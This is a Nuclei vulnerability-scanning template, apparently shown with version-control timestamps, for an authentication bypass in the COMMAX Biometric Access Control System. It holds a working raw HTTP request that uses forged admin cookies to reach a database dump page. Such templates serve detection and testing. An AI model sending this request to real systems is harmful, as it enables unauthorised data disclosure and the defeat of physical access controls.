2021-08-24 11:47:43 +00:00
id : commax-biometric-auth-bypass
2021-08-22 09:19:34 +00:00
info :
name : COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass
author : gy741
severity : critical
2022-05-31 09:00:59 +00:00
description : |
COMMAX Biometric Access Control System 1.0.0 suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings.
2021-08-24 11:43:17 +00:00
reference :
2021-08-24 11:47:43 +00:00
- https://www.exploit-db.com/exploits/50206
2021-08-22 09:19:34 +00:00
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-10-14 11:27:55 +00:00
tags : commax,auth-bypass,edb
2021-08-22 09:19:34 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-08-22 09:19:34 +00:00
- raw :
- |
GET /db_dump.php HTTP/1.1
Host : {{Hostname}}
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer : {{BaseURL}}/user_add.php
Cookie : CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0
matchers-condition : and
matchers :
- type : word
2022-05-31 09:00:59 +00:00
part : body
2021-08-22 09:19:34 +00:00
words :
- "<title>::: COMMAX :::</title>"
- type : word
part : header
words :
- "text/html"
2022-05-27 18:27:14 +00:00
2022-05-31 09:00:59 +00:00
- type : status
status :
- 200
2023-10-19 13:13:52 +00:00
# digest: 4b0a00483046022100adf762270ebe79aa2ee6bc088200bd4c0f4221f82edbff389565be3493b27c27022100bdddedad383301f232577a62691e374bc3ae58feb94ffd38c683894ffa8cd24c:922c64590222798bb761d5b6d8e72950